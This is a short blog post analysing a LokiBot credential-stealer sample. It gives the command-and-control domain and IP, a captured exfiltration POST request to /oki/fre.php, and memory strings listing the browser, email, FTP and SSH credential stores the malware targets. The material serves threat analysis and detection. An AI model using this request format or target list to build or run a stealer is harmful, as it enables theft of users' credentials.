Thursday, April 12, 2018

lokibot sample 

just found on recent submissions on hybrid analysis
https://www.reverse.it/sample/c2678090c55db4f1b39e4d8987b6f3ca6651615fcaae46452f08cad1e8fc6291?environmentId=100
#lokibot

------------

closes itself and re-opens another executable with the same name

------------
interesting packet captures
------------
1.) Domain Name System (response)
    Queries
        kox.termofoc.gr: type A, class IN
    Answers
            Address: 198.12.153.138
2.) POST /oki/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: kox.termofoc.gr
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: E5CE4ED4
Content-Length: 227
Connection: close

..'.......ckav.ru.....[REDACTED USER ID] .......[REDACTED PC NAME].......[REDACTED PC NAME].....................k...........:.....0...2.7.1.8.4.5.3.1.A.2.C.7.0.B.8.D.E.A.0.4.0.E.E.7.....vQURz).....H......ht.ps8:/.w..rerv....it.log.n..`.



------------
interesting strings found in memory
------------
0x247168 (115): HTTP/1.0
User-Agent: %s
Host: %s
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
0x247fb0 (231): i/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: kox.termofoc.gr
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
0x415524 (26): Comodo\Dragon
0x415540 (44): MapleStudio\ChromePlus
0x415570 (26): Google\Chrome
0x4155d4 (26): Titan Browser
0x4155fc (40): Yandex\YandexBrowser
0x415628 (40): Epic Privacy Browser
0x415654 (28): CocCoc\Browser
0x415684 (30): Comodo\Chromodo
0x4156b8 (26): Coowon\Coowon
0x4156d4 (30): Mustang Browser
0x4156f4 (36): 360Browser\Browser
0x41571c (40): CatalinaGroup\Citrio
0x415748 (34): Google\Chrome SxS
0x41578c (44): \Opera\Opera Next\data
0x4157bc (56): \Opera Software\Opera Stable
0x4157f8 (102): \Fenrir Inc\Sleipnir\setting\modules\ChromiumViewer
0x415860 (104): \Fenrir Inc\Sleipnir5\setting\modules\ChromiumViewer
0x415ba0 (62): %s\Mozilla\Firefox\profiles.ini
0x415be0 (60): %s\Mozilla\Firefox\Profiles\%s
0x415c20 (66): %s\Mozilla\SeaMonkey\profiles.ini
0x415c68 (64): %s\Mozilla\SeaMonkey\Profiles\%s
0x415cac (58): %s\Flock\Browser\profiles.ini
0x415ce8 (56): %s\Flock\Browser\Profiles\%s
0x415d24 (54): %s\Thunderbird\profiles.ini
0x415d5c (52): %s\Thunderbird\Profiles\%s
0x415d94 (48): %s\K-Meleon\profiles.ini
0x415dc8 (28): %s\K-Meleon\%s
0x415de8 (64): %s\Comodo\IceDragon\profiles.ini
0x415e30 (62): %s\Comodo\IceDragon\Profiles\%s
0x415e70 (92): %s\NETGATE Technologies\BlackHawk\profiles.ini
0x415ed0 (90): %s\NETGATE Technologies\BlackHawk\Profiles\%s
0x415f2c (46): %s\Postbox\profiles.ini
0x415f5c (44): %s\Postbox\Profiles\%s
0x415f90 (74): %s\8pecxstudios\Cyberfox\profiles.ini
0x415fe0 (72): %s\8pecxstudios\Cyberfox\Profiles\%s
0x416030 (94): %s\Moonchild Productions\Pale Moon\profiles.ini
0x416090 (92): %s\Moonchild Productions\Pale Moon\Profiles\%s
0x4160f0 (50): %s\FossaMail\profiles.ini
0x416124 (48): %s\FossaMail\Profiles\%s
0x416158 (150): %s\Lunascape\Lunascape6\plugins\{9BDD5314-20A6-4d98-AB30-8325A95771EE}\data
0x417120 (28): IMAP Password2
0x417140 (28): NNTP Password2
0x417160 (36): HTTPMail Password2
0x417188 (28): SMTP Password2
0x4171a8 (26): POP3 Password
0x4173d0 (30): %s\32BitFtp.TMP
0x4173f0 (30): %s\32BitFtp.ini
0x417410 (54): %s\Estsoft\ALFTP\ESTdb2.dat
0x417448 (22): %s\site.xml
0x417460 (46): %s\BitKinex\bitkinex.ds
0x4174ac (30): LastUsedProfile
0x4174cc (56): Software\Bitvise\BvSshClient
0x417508 (40): %s\BlazeFtp\site.dat
0x417538 (72): Software\FlashPeak\BlazeFtp\Settings
0x417584 (24): LastPassword
0x4175b4 (22): LastAddress
0x417618 (88): Software\NCH Software\ClassicFTP\FTPAccounts
0x417694 (24): %s\Cyberduck
0x4176b0 (22): user.config
0x4176c8 (30): %s\iterate_GmbH
0x4176e8 (30): %s\EasyFTP\data
0x4181b8 (64): Software\9bis.com\KiTTY\Sessions
0x418200 (70): Software\SimonTatham\PuTTY\Sessions
0x418438 (22): %s\SmartFTP
0x418460 (44): %s\Staff-FTP\sites.ini
0x418490 (44): %s\Steed\bookmarks.txt
0x4184c0 (26): %s\SuperPutty
0x4189b0 (164): 

aPLib v1.01  -  the smaller the better :)
Copyright (c) 1998-2009 by Joergen Ibsen, All Rights Reserved.

More information: http://www.ibsensoftware.com/
0x4a0074 (35): https://kox.termofoc.gr/oki/fre.php
Posted by at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)